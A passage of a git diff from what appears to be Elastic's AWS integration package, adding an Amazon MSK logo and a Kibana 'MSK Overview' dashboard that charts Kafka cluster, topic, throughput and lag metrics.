The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | + diff --git a/packages/aws/img/logo_msk.svg b/packages/aws/img/logo_msk.svg new file mode 100644 index 00000000000..43cfc2fcfc5 --- /dev/null +++ b/packages/aws/img/logo_msk.svg @@ -0,0 +1,10 @@ + + + Icon-Architecture/64/Arch_Amazon-Managed-Streaming-for-Apache-Kafka_64 + + + + + + + \ No newline at end of file diff --git a/packages/aws/img/metricbeat-aws-kafka-overview.png b/packages/aws/img/metricbeat-aws-kafka-overview.png new file mode 100644 index 00000000000..e64dbdd3477 Binary files /dev/null and b/packages/aws/img/metricbeat-aws-kafka-overview.png differ diff --git a/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json b/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json index d89971ca52c..2ad5edc0b96 100644 --- a/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json +++ b/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json @@ -569,13 +569,13 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Unique count", - "operationType": "unique_count", + "label": "Count of Records", + "operationType": "count", "params": { "emptyAsNull": true }, "scale": "ratio", - "sourceField": "_id" + "sourceField": "___records___" } }, "incompleteColumns": {} diff --git a/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json b/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json new file mode 100644 index 00000000000..ac29d52a260 --- /dev/null +++ b/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json 
@@ -0,0 +1,1201 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"fc374900-4386-4d57-9d59-8d8b940d0c3d\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"fc374900-4386-4d57-9d59-8d8b940d0c3d\",\"fieldName\":\"aws.dimensions.ClusterName\",\"title\":\"Cluster Name\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"enhancements\":{}}},\"4806d559-30dd-4890-b999-8240e9249890\":{\"type\":\"optionsListControl\",\"order\":5,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4806d559-30dd-4890-b999-8240e9249890\",\"fieldName\":\"aws.dimensions.Topic\",\"title\":\"Topic\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"c0dcfa25-9377-4534-9ae6-8ce5b360ee9c\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"c0dcfa25-9377-4534-9ae6-8ce5b360ee9c\",\"fieldName\":\"cloud.region\",\"title\":\"AWS Region\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"f11a9c4d-2fd7-44bd-8498-239d6cababcf\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f11a9c4d-2fd7-44bd-8498-239d6cababcf\",\"fieldName\":\"cloud.account.name\",\"title\":\"AWS Account Name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"2cb60304-88a4-4b96-9fb2-77d0ce255793\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"2cb60304-88a4-4b96-9fb2-77d0ce255793\",\"fieldName\":\"cloud.account.id\",\"title\":\"AWS Account 
ID\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"8dd0901c-9fb4-4ecd-b4cf-08826c2c4399\":{\"type\":\"optionsListControl\",\"order\":4,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"8dd0901c-9fb4-4ecd-b4cf-08826c2c4399\",\"fieldName\":\"aws.dimensions.ConsumerGroup\",\"title\":\"Consumer Group\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.kafka_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.kafka_metrics" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Clusters", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.ClusterName" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + 
"indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "colorMode": "None", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf", + "w": 5, + "x": 0, + "y": 0 + }, + "panelIndex": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Consumer Groups", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.ConsumerGroup" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": 
"bd807a7f-01e5-4b12-9e31-da545c770961", + "w": 5, + "x": 5, + "y": 0 + }, + "panelIndex": "bd807a7f-01e5-4b12-9e31-da545c770961", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Topics", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.Topic" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "8c6af195-c6ea-4d12-b7d6-1656b62d2694", + "w": 5, + "x": 10, + "y": 0 + }, + "panelIndex": "8c6af195-c6ea-4d12-b7d6-1656b62d2694", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + 
"currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "MessagesInPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.MessagesInPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + 
"labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "dd04e422-baf3-45cb-ae3e-87811250354a", + "w": 33, + "x": 15, + "y": 0 + }, + "panelIndex": "dd04e422-baf3-45cb-ae3e-87811250354a", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": 
"bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "BytesInPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.BytesInPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + 
"preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "2b223bf3-4ce1-4712-9239-375da4bccadd", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "2b223bf3-4ce1-4712-9239-375da4bccadd", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + 
"customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "BytesOutPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.BytesOutPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "60a4dc4d-a16a-46e7-b10b-456035625ecf", + "w": 24, + "x": 24, + "y": 15 + }, + "panelIndex": "60a4dc4d-a16a-46e7-b10b-456035625ecf", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": 
[ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "EstimatedMaxTimeLag", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "duration", + "params": { + "decimals": 0, + "toUnit": "asSeconds" + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.EstimatedMaxTimeLag.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": 
"kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "5c75d539-3641-4ae8-8b3e-d97496c45c74", + "w": 24, + "x": 0, + "y": 30 + }, + "panelIndex": "5c75d539-3641-4ae8-8b3e-d97496c45c74", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + 
"isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "SumOffsetLag", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.SumOffsetLag.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } 
+ ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a", + "w": 24, + "x": 24, + "y": 30 + }, + "panelIndex": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a", + "title": "MSKBytesInPerSec", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Metrics AWS] MSK Overview", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-21T23:23:15.393Z", + "id": "aws-62d43b00-d10d-11ee-b93f-db5ae1f208de", + "managed": false, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bd807a7f-01e5-4b12-9e31-da545c770961:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8c6af195-c6ea-4d12-b7d6-1656b62d2694:indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dd04e422-baf3-45cb-ae3e-87811250354a:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2b223bf3-4ce1-4712-9239-375da4bccadd:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"60a4dc4d-a16a-46e7-b10b-456035625ecf:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c75d539-3641-4ae8-8b3e-d97496c45c74:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "243e3dfe-db88-4e6e-92b1-fd86f25ec44a:indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_fc374900-4386-4d57-9d59-8d8b940d0c3d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4806d559-30dd-4890-b999-8240e9249890:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c0dcfa25-9377-4534-9ae6-8ce5b360ee9c:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f11a9c4d-2fd7-44bd-8498-239d6cababcf:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_2cb60304-88a4-4b96-9fb2-77d0ce255793:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_8dd0901c-9fb4-4ecd-b4cf-08826c2c4399:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/aws/manifest.yml 